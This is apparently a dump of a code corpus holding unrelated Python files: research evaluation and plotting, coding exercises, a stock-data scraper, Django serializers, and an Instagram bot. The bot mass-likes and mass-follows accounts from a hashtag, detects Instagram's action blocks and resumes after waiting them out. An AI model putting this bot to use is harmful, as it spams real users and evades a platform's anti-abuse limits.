0].mean()\n\nMIXER_score = np.apply_along_axis(get_score_vector, arr = MIXER_data_np, axis = 1, nutrient_data = nutrient_data)\nMIXER_RDI_score = np.apply_along_axis(get_reward_ver2, arr = MIXER_score, axis = 1, done = 0)[:, 0].mean()\n\nTFR_score = np.apply_along_axis(get_score_vector, arr = TFR_data_np, axis = 1, nutrient_data = nutrient_data)\nTFR_RDI_score = np.apply_along_axis(get_reward_ver2, arr = TFR_score, axis = 1, done = 0)[:, 0].mean()\n\n\n# %%\n'''\nData Merge for Barplotting\n'''\nreal_reward = np.apply_along_axis(get_reward_ver2, axis = 1, arr = nutrient_real, done = 0)[:, 2].sum(axis = 0).reshape(1, -1)\nMIP_reward = np.ones([1, 13]) * 1072 # MIP의 결과는 만점이므로 그냥 모든 영양소 기준에 대해 만족한 식단의 갯수를 1072로 고정\n\nreward_dist_stack = np.append(real_reward, reward_dist_stack, axis = 0) # 방법론 별 보상 분포\nreward_dist_stack = np.append(reward_dist_stack, MIP_reward, axis = 0) # 방법론 별 보상 분포\n\ntypes_of_nutrient = np.array([['calorie', 'protein', 'fiber', 'vitaA', 'vitaC', 'vitaB1', 'vitaB2', 'calcium', 'iron', 'sodium', 'linoleic', r'$\\alpha$-linolenic', 'macroRatio']]).T\ntypes_of_method = ['real', 'TFR', 'SCST', 'MIXER', 'MIP']\n\nconat_rds_all = np.empty([0, 3]) # value, nutrient, method 3개 축으로 구성됨\nfor i in range(reward_dist_stack.shape[0]):\n concat_rds = np.append(reward_dist_stack[i, :].reshape(-1, 1), types_of_nutrient, axis = 1)\n concat_rds = np.append(concat_rds, np.repeat(types_of_method[i], concat_rds.shape[0]).reshape(-1, 1), axis = 1)\n conat_rds_all = np.vstack([conat_rds_all, concat_rds])\n\nreward_dist_stack_df = pd.DataFrame(conat_rds_all)\nreward_dist_stack_df.columns = np.array(['count', 'nutrient', 'method'])\nreward_dist_stack_df['count'] = reward_dist_stack_df['count'].astype('float')\nreward_dist_stack_df['nutrient'] = reward_dist_stack_df['nutrient'].astype('str')\n\n# %%\n'''\nBarplotting\n'''\ncolors = [\"#d62728\", \"#1f77b4\"]\n# sns.set(style = 'darkgrid')\nsns.set_palette(sns.color_palette(colors))\n\nnut_ = reward_dist_stack_df[(reward_dist_stack_df['method'] == \"real\") | (reward_dist_stack_df['method'] == \"TFR\")]\nnut_list = [nut_]\nplt.xticks(rotation = 45)\n\n# colors = [\"#d62728\", \"#1f77b4\", \"#ff7f0e\", \"#2ca02c\", \"black\"]\n# nut0 = reward_dist_stack_df[(reward_dist_stack_df['nutrient'] == \"calorie\") | (reward_dist_stack_df['nutrient'] == \"protein\") | (reward_dist_stack_df['nutrient'] == \"macroRatio\")]\n# nut1 = reward_dist_stack_df[(reward_dist_stack_df['nutrient'] == \"vitaA\") | (reward_dist_stack_df['nutrient'] == \"vitaC\") | (reward_dist_stack_df['nutrient'] == \"vitaB1\") | (reward_dist_stack_df['nutrient'] == \"vitaB2\")]\n# nut2 = reward_dist_stack_df[(reward_dist_stack_df['nutrient'] == \"fiber\") | (reward_dist_stack_df['nutrient'] == \"calcium\") | (reward_dist_stack_df['nutrient'] == \"iron\") | (reward_dist_stack_df['nutrient'] == \"sodium\")]\n# nut3 = reward_dist_stack_df[(reward_dist_stack_df['nutrient'] == \"linoleic\") | (reward_dist_stack_df['nutrient'] == r\"$\\alpha$-linolenic\")]\n# nut_list = [nut0, nut1, nut2, nut3]\n\nfor i, val in enumerate(nut_list):\n plot_name = \"reward_distributoin_compare_nut_.png\"\n # plot_name = \"reward_distributoin_compare_nut_\" + str(i) + \".png\"\n ax = sns.barplot(x = 'nutrient', y = 'count', hue = 'method', data = val)\n\n for p in ax.patches:\n left, bottom, width, height = p.get_bbox().bounds\n ax.annotate(\"%.1d\" % height, (left + width/2, height), ha='center', va='center', fontsize = 7, rotation = 90, xytext = (0, 10), textcoords = 'offset points')\n\n ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n figure_dir = '/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/figures/' + plot_name\n plt.savefig(figure_dir, bbox_inches='tight')\n plt.clf()\n# %%\n'''\nReward Ploting\n'''\n\n## training plot over time-through rewards 그리기\nfrom os import listdir\nfrom os.path import isfile, join\n\n# 단일 방법론\n# dir_file_name = '/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/SCST_eb=None_bs=None_lr=0.001_epoch=5000_rewards.csv'\n# plot_reward(dir_file_name)\n\n# 복수의 방법론 비교\n# reward plot 그릴 파일 담기\nfiles = [f for f in listdir('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results') if isfile(join('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results', f))]\n# keyword1 = \"SCST\"\n# keyword2 = \"MIXER\"\n# keyword3 = \"bs=10\"\n# filtered_files = [a_file for a_file in files if keyword1 in a_file or keyword2 in a_file or keyword3 in a_file]\nkeyword = \"plot\"\nfiltered_files = [a_file for a_file in files if keyword in a_file]\n\n# filtered_files 리스트에 담긴 파일 순서 바꾸기\nmy_order = [1, 2, 0]\nrearranged_files = [filtered_files[order] for order in my_order] \n\n# results로 현재 디렉토리 (cwd) 디렉토리 변경 (change directory: chdir)\nos.chdir(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results\")\n\ntrunc_range = 1\nreward_over_methods_df = pd.DataFrame([])\nfor each_file in rearranged_files:\n method = each_file.split('_eb')[0]\n tmp = pd.read_csv(each_file)\n tmp['method'] = np.repeat(method, tmp.shape[0])\n\n # observation을 trunc_range로 잘라서 각 range별로 reward를 보고 싶다면\n # tmp2 = tmp.iloc(axis = 0)[tmp['reward'].groupby(tmp['reward'].index // trunc_range).agg(['min', 'median', 'mean', 'max']).dropna().index * trunc_range + (trunc_range - 1)]\n # tmp2.reset_index(inplace = True)\n # reward_over_methods_df = pd.concat([reward_over_methods_df, tmp2])\n\n # 순전하게 모든 observation에서의 reward를 보고 싶다면\n reward_over_methods_df = pd.concat([reward_over_methods_df, tmp])\n\nreward_over_methods_df.to_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/total_rewards.csv')\n\nplot_reward('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/total_rewards.csv')\n# %%\n","sub_path":"Code/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":17704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446485002","text":"import sys\nsys.stdin = open('input.txt','r')\n\n# from itertools import permutations\nT = int(input())\nfor tc in range(1,T+1):\n N =int(input())\n town = [[0]*101 for _ in range(101)]\n Town = [[]]\n WnH = []\n l = list(map(int,input().split()))\n\n C = 0\n for a in range(0,(N+2)*2,2):\n if a == 0 :\n WnH.append(('일',l[a],l[a+1]))\n elif a == 2:\n WnH.append(('집',l[a],l[a+1]))\n else:\n C += 1\n Town.append((C, l[a], l[a + 1]))\n print(WnH)\n print(Town)\n\n\n\n'''\n customers = [a for a in range(N)]\n nod = [[] for _ in range(N+1)]\n for a in range(1,N+1):\n for e in range(1,N+1):\n if a != e: nod[a].append(e)\n \n\n # cusper = list(permutations(customers))\n # print(cusper)\n print(nod)\n \n for cs in range(1,N+1):\n sc,si,sj = Town[cs] # 시작하는 고객번호, 고객좌표\n lc, li, lj = WnH[1] # 끝나는 고객번호, 고객좌표\n stack = [(sc,si,sj)]\n visit = [(sc,si,sj)]\n workdis = abs(WnH[0][1] - si) + abs(WnH[0][2] - sj) # 일~시작고객 거리\n mindis = 0xfffff\n while stack:\n if sc == lc and : # 마지막 고객 방문 \n workdis += abs(WnH[0][1] - si) + abs(WnH[1][2] - sj) # 마지막고객 ~ 거리\n \n for nxt in nod[sc]:\n nc,ni,nj = nxt,Town[nxt][1],Town[nxt][2]\n if (nc,ni,nj) not in visit:\n if workdis + (abs(ni - si) + abs(nj - sj)) < mindis:\n workdis += (abs(ni - si) + abs(nj - sj))\n visit.append(nc,ni,nj)\n stack.append(sc,si,sj)\n sc, si, sj = nc,ni,nj\n break\n else: sc,si,sj = stack.pop()\n\n print(visit)\n print(mindis)\n print()\n\n'''\n'''\n C = 0\n for a in range(0,(N+2)*2,2):\n if a == 0 :\n town[l[a]][l[a+1]] = '일'\n elif a == 2:\n town[l[a]][l[a + 1]] = '집'\n else:\n C += 1\n town[l[a]][l[a+1]] = C\n\n for t in town : print(t)\n print('\\n,\\n')\n'''","sub_path":"Problem/SWEA/D5/1247(F).py","file_name":"1247(F).py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"75563023","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\nfrom selenium import webdriver\nimport time\nimport math \nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\ntry: \n link = \"http://suninjuly.github.io/explicit_wait2.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n book = browser.find_element_by_css_selector(\"button\")\n price = WebDriverWait(browser, 15).until(\n EC.text_to_be_present_in_element((By.ID, \"price\"), \"$100\"))\n book.click()\n x = int(browser.find_element_by_css_selector(\"#input_value\").text)\n answer = calc(x)\n ans = browser.find_element_by_css_selector(\"#answer\")\n ans.send_keys(str(answer))\n submit = browser.find_element_by_css_selector(\"[type = 'submit']\")\n submit.click()\n \nfinally:\n time.sleep(10)\n browser.quit()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"2_4__2.py","file_name":"2_4__2.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"197915302","text":"# Homework 2 - 6/19/20\n# Lists, Loops, Conditionals\n\n# Testing:\n# Modify the tets calls below each function for early testing. Then, in Terminal, simply type:\n# python hw2_submission.py\n\n# Final Scoring:\n# When you finish, navigate to your code directory in Terminal and run with python hw2_tests.py\n# This uses your code in this file and prints test results.\n\n# The list you will use for your testing is this one here:\nnumList = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096, 8192]\nwordList = [\"hmm\", \"why\", \"does\", \"it\", \"smell\", \"like\", \"burnt\", \"toast\", \"here\"]\nmixedList = [\"going\", 2, \"raise\", 8, \"baby\", \"geese\"]\n\n# (Easy) Write the code for two functions, manualAbs() and smartAdd().\n\n# manualAbs()\n# Takes a number num, and returns the absolute value.\n# For this question, you are NOT allowed to use the pre-existing abs() function.\n# Hint: Use if statements.\ndef manualAbs(num):\n # Your code starts here. \n if (num > 0):\n return num\n else:\n return (num*-1)\n\n# Test call to the function.\nprint ( manualAbs(-40) )\n\n\n# sumList() \n# Adds the values of all values in a list, and returns that sum.\n# Hint: Use a loop.\ndef sumList(list):\n # Your code starts here\n # list = numList by my default setup.\n sum = 0\n for x in list:\n sum += x\n return sum\n\n# Test call to the function.\nprint ( sumList(numList) )\n\n\n\n# (Medium) Write the code for the function, cutShort().\n\n# cutShort()\n\n# Part 1 - Build it to work for a list of strings\n# Create a new list of all the words in wordList with length greater than n.\n# Finish by returning the new list. Don't modify the old list.\n# Hint: The length of a string can be found with len()\ndef cutShort(list, n):\n # Your code starts here \n newList = []\n for x in list:\n if (isinstance(x, int)):\n if (x > n):\n newList.append(x)\n elif (isinstance(x, str)):\n if (len(x) > n):\n newList.append(x)\n return newList\n\n\nprint ( cutShort(wordList, 3) )\n\n# Part 2 - Modify the above function to work for a mixed list of both strings and integers, \n# where integers less than or equal to n are cut.\n# Hint: Use if statements and this resource:\n# https://www.w3schools.com/python/ref_func_isinstance.asp\n\n# print ( cutShort(mixedList, 2))","sub_path":"Homework2/hw2_key.py","file_name":"hw2_key.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"358980060","text":"import torch\n\n\ndef eval_ppl(ce_loss, mask):\n \"\"\"\n :param ce_loss: CrossEntropyLoss with shape (batch size, length)\n :param resp: Response with same shape as ce_loss\n :param pad_id: Pad ID\n :return: Sentence-level average ppl value\n \"\"\"\n mask = mask.float()\n lens = mask.sum(dim=-1)\n loss = (ce_loss * mask).sum(dim=-1)\n loss /= (lens + 1e-5)\n return torch.exp(loss)\n","sub_path":"TCFC/eval/metrics/eval_ppl.py","file_name":"eval_ppl.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"271110669","text":"#coding=utf-8\n\nimport gzip\nimport http.cookiejar\nimport urllib.request\nimport urllib.parse\nimport json\nimport os\nimport time\nimport datetime\n\ndef getOpener(head):\n # deal with the Cookies\n cj = http.cookiejar.CookieJar()\n pro = urllib.request.HTTPCookieProcessor(cj)\n opener = urllib.request.build_opener(pro)\n header = []\n for key, value in head.items():\n elem = (key, value)\n header.append(elem)\n opener.addheaders = header\n return opener\n\ndef ungzip(data):\n try: # 尝试解压\n print('正在解压.....')\n data = gzip.decompress(data)\n print('解压完毕!')\n except:\n print('未经压缩, 无需解压')\n return data\ndef writeFile(fname,data):\n filename = r'../tmp/'+fname+'.txt'\n if os.path.exists(filename):\n message = '文件 + '+filename +' 已存在,跳过'\n else:\n message = '文件 + '+filename +' 不存在,新建'\n \n f=open(filename,'w')\n f.write(data)\n f.close()\n print ('文件:'+fname+' 处理完毕。')\n'''\n读取抓取数据开始日期\n如果不存在该日期,从10日前开始读取\n如果存在从文件内日期开始读取\n读到今天\n'''\nheader = {\n 'Connection': 'Keep-Alive',\n 'Accept': '*/*',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36',\n 'Accept-Encoding': 'gzip, deflate',\n 'Host': '',\n 'Referer' : ''\n}\nshUrl = 'http://query.sse.com.cn/infodisplay/showTradePublicFile.do?dateTx='#2015-09-28\nszUrl = ['http://www.szse.cn/szseWeb/common/szse/files/text/jy/jy',#150923.txt\n 'http://www.szse.cn/szseWeb/common/szse/files/text/smeTxt/gk/sme_jy',#150708.txt\n 'http://www.szse.cn/szseWeb/common/szse/files/text/nmTxt/gk/nm_jy']#150902.txt\nstartFileName = r'startDay.txt'\nendDay = datetime.datetime.now()\n\nif os.path.exists(startFileName):\n print('日期配置文件存在,开始读取')\n f=open(startFileName,'rt')\n s = f.readline()\n f.close()\n if s!='':\n print('将从日期:'+s+' 开始读取')\n timeArray = time.strptime(s, \"%Y%m%d\")\n timeStamp = int(time.mktime(timeArray))\n fromDay = datetime.datetime.utcfromtimestamp(timeStamp)\n else:\n print('日期配置文件为空,将从10日前日期开始读取')\n fromDay = endDay - datetime.timedelta(days = 10)\nelse:\n print('日期配置文件不存在,将从10日前日期开始读取')\n fromDay = endDay - datetime.timedelta(days = 10)\n\nendDay = endDay + datetime.timedelta(days = 1)\n\nwhile fromDay.strftime(\"%Y%m%d\")!=endDay.strftime(\"%Y%m%d\"):\n print(fromDay.strftime(\"%Y%m%d\"))\n \n '''\n 循环上面日期\n 抓取上证,深证,中小创交易龙虎榜数据\n\n 如果内容不为空\n\n 文件不存在\n\n 写入文件\n '''\n #抓取上证龙虎榜数据\n url = shUrl + fromDay.strftime(\"%Y-%m-%d\")\n print('读取上证龙虎榜\\n'+url)\n\n header['Host'] = 'query.sse.com.cn'\n header['Referer'] = 'http://www.sse.com.cn/disclosure/diclosure/public/'\n\n try:\n opener = getOpener(header)\n op = opener.open(url)\n data = op.read()\n data = data.decode()\n jsonData = json.loads(data)\n outData = ''\n if (jsonData['fileContents']!=''):\n for info in jsonData['fileContents']:\n outData= outData+ info+'\\n'\n writeFile(fromDay.strftime(\"%Y-%m-%d\")+'_上证',outData)\n except:\n print(fromDay.strftime(\"%Y-%m-%d\")+'跳过')\n\n \n #抓取深证,中小创交易龙虎榜数据\n i=1\n for url in szUrl:\n if(i==1):\n name = '深证'\n elif(i==2):\n name = '中小板'\n else:\n name = '创业板'\n url = url + fromDay.strftime(\"%y%m%d\")+'.txt'\n print('读取'+name+'龙虎榜\\n'+url)\n header['Host'] = 'www.szse.cn'\n header['Referer'] = 'http://www.szse.cn'\n try:\n opener = getOpener(header)\n op = opener.open(url)\n data = op.read()\n data = ungzip(data)\n data = data.decode('gbk')\n writeFile(fromDay.strftime(\"%Y-%m-%d\")+'_'+name,data)\n except:\n print(fromDay.strftime(\"%Y-%m-%d\")+'跳过')\n i=i+1\n\n \n fromDay = fromDay + datetime.timedelta(days = 1)\n\n#最后更新日期为当前日期\nprint('设置最新日期')\nfromDay = fromDay - datetime.timedelta(days = 1)\nf=open(startFileName,'w')\nf.write(fromDay.strftime(\"%Y%m%d\"))\nf.close()\nprint('读取完成')\n","sub_path":"tiger_list/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"516830788","text":"from rest_framework import serializers\nfrom django.contrib.auth.models import User\nfrom api.models import Category, Product\n\nfrom api.models import Category, Product, Client\n\n\nclass CategorySerializer1(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n name = serializers.CharField()\n\n def create(self, validated_data):\n return Category.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.save()\n return instance\n\n\nclass ClientSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n name = serializers.CharField()\n\n def create(self, validated_data):\n return Client.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.save()\n return instance\n\n\nclass CategorySerializer2(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ('id', 'name')\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n category = CategorySerializer2(read_only=True)\n category_id = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = Product\n fields = ('id', 'name', 'price', 'description', 'category', 'category_id',)\n\n\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ['id', 'username', 'email', 'password']\n extra_kwargs = {'password': {'write_only': True}}\n\n def create(self, validated_data):\n user = User.objects.create_user(**validated_data)\n return user\n\n\nclass AdminSerializer(serializers.ModelSerializer):\n client = CategorySerializer2(read_only=True)\n client_id = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = Product\n fields = ('id', 'name', 'client', 'client_id',)\n","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"34533521","text":"# Download Hipparcos data from\n# http://vizier.u-strasbg.fr/cgi-bin/VizieR?-source=I/239/hip_main\n# Get HIP, RAhms, DEdms, RA(ICRS)(RA in deg), DE(ICRS)(DE in deg),\n# Plx (mas), pmRA(mas/yr; mu_alpha*cos(de)), pmDE(mas/yr),\n# Also get SIMBAD computed distance, Galactic, J2000, B1950 and\n# Ecl. J2000 values; positions in decimal degrees. Ouput is \"|\"\n# separated values.\n# se = \"\"\" \"\"\"\nimport pytpm\nfrom pytpm import tpm, convert\n\nraj2000 = []\ndej2000 = []\nglat = []\nglon = []\n\ni = 1\nfor line in open(\"/home/phn/Downloads/hipparcos.tsv\", \"rt\"):\n if i <= 40:\n i += 1\n continue\n cols = line.split(\"|\")\n if cols[0].strip() == \"\":\n continue\n glon.append(float(cols[0]))\n glat.append(float(cols[1]))\n raj2000.append(float(cols[2]))\n dej2000.append(float(cols[3]))\n rab1950 = float(cols[4])\n deb1950 = float(cols[5])\n elon2000 = float(cols[6])\n elat2000 = float(cols[-1])\n rahip = float(cols[10])\n dehip = float(cols[11])\n plx = float(cols[12])\n pmra = float(cols[13])\n pmde = float(cols[14])\n \n\n\n#import timeit\n# \n#t= timeit.Timer(\n# 'convert.convert(ra=raj2000, de=dej2000, s2=tpm.TPM_S04)',\n# se)\n \n","sub_path":"doc/examples/hip_convert.py","file_name":"hip_convert.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422218114","text":"from time import sleep\nfrom random import randint\nimport Setup\nimport Get_followers_from_people\nimport time\nimport datetime\nfrom selenium.webdriver.common.keys import Keys\nimport MySQLdb\nimport Main\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\n\nimport pymysql\nimport traceback\ntime_start_ban_like = 0\ntime_start_ban_follow = 0\n\n\ndef get_hashtag_page(browser):\n try:\n browser.get('https://www.instagram.com/explore/tags/' + Setup.hashtag + '/')\n sleep(2)\n body_elem = browser.find_element_by_tag_name('body')\n for _ in range(randint(0, 3)):\n body_elem.send_keys(Keys.END)\n sleep(2)\n body_elem.send_keys(Keys.HOME)\n sleep(2)\n\n browser.find_element_by_xpath('//article/div[2]/div/div/div/a/div/div[2]').click()\n sleep(2)\n\n\n\n except Exception as e:\n print(\"type error: \" + str(e))\n\n\ndef check_ban_like(browser):\n global time_start_ban_like\n try:\n if Setup.like < Setup.like_limit:\n url = browser.current_url\n try:\n sleep(2)\n browser.find_element_by_xpath('//button/span[contains(@class, \"glyphsSpriteHeart__filled__24__red_5 u-__7\")]')\n print(\"You already liked this post\")\n except:\n WebDriverWait(browser, 20).until(EC.element_to_be_clickable((By.XPATH, '//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]')))\n browser.find_element_by_xpath('//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]').click()\n print(\"Set like\")\n sleep(randint(5, 10))\n try:\n browser.get(url)\n print(\"Checking like..\")\n WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]')))\n print(datetime.datetime.now())\n print(\"It's impossible to put any like, you are being banned:\")\n print(\"The program will continue to just follow people\")\n Get_followers_from_people.like_blocked = True\n time_start_ban_like = time.time()\n Setup.like = 25\n\n except:\n Setup.like += 1\n print(\"Like ok\")\n except:\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n sleep(randint(2, 4))\n\n\ndef like(browser):\n global like_blocked\n try:\n if Setup.like < Setup.like_limit:\n try:\n browser.find_element_by_xpath('//button/span[contains(@class, \"glyphsSpriteHeart__filled__24__red_5 u-__7\")]')\n # print(\"You already liked this post\")\n except:\n WebDriverWait(browser, 20).until(EC.element_to_be_clickable((By.XPATH, '//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]')))\n browser.find_element_by_xpath('//button/span[contains(@class, \"glyphsSpriteHeart__outline__24__grey_9 u-__7\")]').click()\n Setup.like += 1\n sleep(randint(5,10))\n except:\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n sleep(randint(2, 4))\n\n\ndef follow(browser):\n try:\n if Setup.follow <= Setup.follow_limit:\n\n try:\n browser.find_element_by_xpath('//div/button[text()=\"Follow\"]').click()\n # ('Saving name')\n user = browser.find_element_by_xpath('//a[contains(@class, \"FPmhX notranslate nJAzx\")]').get_attribute(\"title\")\n timenow = time.time()\n\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\"\n INSERT INTO FOLLOWED \n (name, timePassed, profile_get_followers, attempt_get_followed_back) \n VALUES \n (%s, %s, %s, 0)\"\"\", (str(user), timenow, Setup.hashtag))\n conn.commit()\n conn.close()\n\n Setup.follow += 1\n sleep(randint(5, 10))\n\n except:\n print('Impossible following because you already follow this user')\n sleep(randint(2, 5))\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n print(\"skip to next one\")\n\n\n\n elif Setup.follow > Setup.follow_limit:\n print(\"You exceeded the follow limit : (\", Setup.follow_limit, \") for this session\")\n\n\n except: # Exception as e:\n sleep(1)\n\n #print(\"type error: \" + str(e))\n\n\ndef check_ban_follow(browser, conn):\n global time_start_ban_follow\n try:\n if Setup.follow <= Setup.follow_limit:\n\n try:\n url = browser.current_url\n browser.find_element_by_xpath('//div/button[text()=\"Follow\"]').click()\n followed_name = browser.find_element_by_xpath('//a[contains(@class, \"FPmhX notranslate nJAzx\")]').get_attribute(\"title\")\n timenow = time.time()\n sleep(15)\n try:\n browser.get(url)\n WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//span/button[text()=\"Follow\"]')))\n print(datetime.datetime.now())\n Get_followers_from_people.follow_blocked = True\n time_start_ban_follow = time.time()\n Setup.follow = 35\n except:\n print(\"Follow ok\")\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\"\n INSERT INTO FOLLOWED \n (name, timePassed, profile_get_followers, attempt_get_followed_back) \n VALUES \n (%s, %s, %s, 0)\"\"\", (followed_name, timenow, Setup.hashtag))\n\n conn.close()\n\n Setup.follow += 1\n\n except:\n print('Impossible following because you already follow this user')\n sleep(randint(2, 5))\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n print(\"skip to next one\")\n\n\n\n elif Setup.follow >= Setup.follow_limit:\n print(\"You exceeded the follow limit : (\", Setup.follow_limit, \") for this session\")\n\n\n except: #Exception as e:\n sleep(1)\n\n #print(\"type error: \" + str(e))\n\n\n\n\ndef skip_next_picture(browser):\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n # print(\"skip\")\n sleep(randint(2, 5))\n\n\ndef actions(browser, conn):\n followed = 0\n try:\n browser.get('https://www.google.com')\n except Exception as e:\n print(\"type error: \" + str(e))\n print('No such session! starting webDivers!')\n Main.start_browser()\n\n try:\n time_check_ban = time.time()\n if (time_check_ban - time_start_ban_like) >= 7200:\n Get_followers_from_people.like_blocked = False\n if (time_check_ban - time_start_ban_follow) >= 7200:\n Get_followers_from_people.follow_blocked = False\n print('Liking and Following')\n for _ in range(randint(17, 23)):\n\n if Setup.like <= Setup.like_limit:\n get_hashtag_page(browser)\n check_ban_like(browser)\n\n if Setup.follow <= Setup.follow_limit:\n get_hashtag_page(browser)\n check_ban_follow(browser, Setup.conn)\n followed += 1\n\n get_hashtag_page(browser)\n\n for operations in range(5):\n if Get_followers_from_people.like_blocked == True and Get_followers_from_people.follow_blocked == True:\n break\n choose_to_follow = 0\n if Get_followers_from_people.like_blocked == False and Setup.like <= Setup.like_limit:\n like(browser)\n choose_to_follow = randint(1, 2)\n if choose_to_follow == 1 and Get_followers_from_people.follow_blocked == False and Setup.follow <= Setup.follow_limit:\n follow(browser)\n followed += 1\n skip_next_picture(browser)\n for _ in range(1, 4):\n skip_next_picture(browser)\n if Get_followers_from_people.follow_blocked == False and Setup.follow <= Setup.follow_limit:\n follow(browser)\n for _ in range(1, 4):\n skip_next_picture(browser)\n\n except: #Exception as e:\n\n #print(\"type error: \" + str(e))\n\n #print(traceback.format_exc())\n sleep(1)\n\n update_data_db(followed)\n print(\"Tot Post Liked: \", Setup.like)\n print(\"Tot Followed users: \", Setup.follow)\n\n\ndef check_follow_admin(browser):\n try:\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((By.XPATH, '//span/button[text()=\"Follow\"]')))\n browser.find_element_by_xpath('//span/button[text()=\"Follow\"]').click()\n print(\"Following the admin\")\n except:\n sleep(1)\n\n\ndef follow_admins(browser):\n browser.get(\"https://www.instagram.com/saminabayat\")\n check_follow_admin(browser)\n browser.get(\"https://www.instagram.com/cocoolinaa\")\n check_follow_admin(browser)\n browser.get(\"https://www.instagram.com/nancy_ismaiil\")\n check_follow_admin(browser)\n browser.get(\"https://www.instagram.com/currentlylizzie\")\n check_follow_admin(browser)\n\n\n\ndef update_data_db(followed):\n try:\n\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\" \n SELECT follow_done \n FROM DATA_PEOPLE_GET_FOLLOWERS \n WHERE date_count = CURDATE() AND name = '%s' \"\"\" % Setup.hashtag)\n follow_done = a.fetchone()\n rows = a.rowcount\n conn.commit()\n conn.close()\n if rows == 1:\n print(\"update mysql\")\n follow_done = follow_done[0] + followed\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\"\n UPDATE DATA_PEOPLE_GET_FOLLOWERS\n SET follow_done = %s \n WHERE name = %s and date_count = CURDATE()\n \"\"\", (follow_done, Setup.hashtag))\n conn.commit()\n conn.close()\n else:\n print(\"create mysql\")\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\"\n INSERT INTO DATA_PEOPLE_GET_FOLLOWERS \n (name, date_count, followers_got, follow_done) \n VALUES \n (%s, CURDATE(), 0, %s)\"\"\", (Setup.hashtag, followed))\n conn.commit()\n conn.close()\n except Exception as e:\n print(\"type error: \" + str(e))\n print(traceback.format_exc())","sub_path":"Like_follow.py","file_name":"Like_follow.py","file_ext":"py","file_size_in_byte":11744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"326581831","text":"import socket\nimport os \n\n#Script to make download from a server\n\ndef down(filename, s, 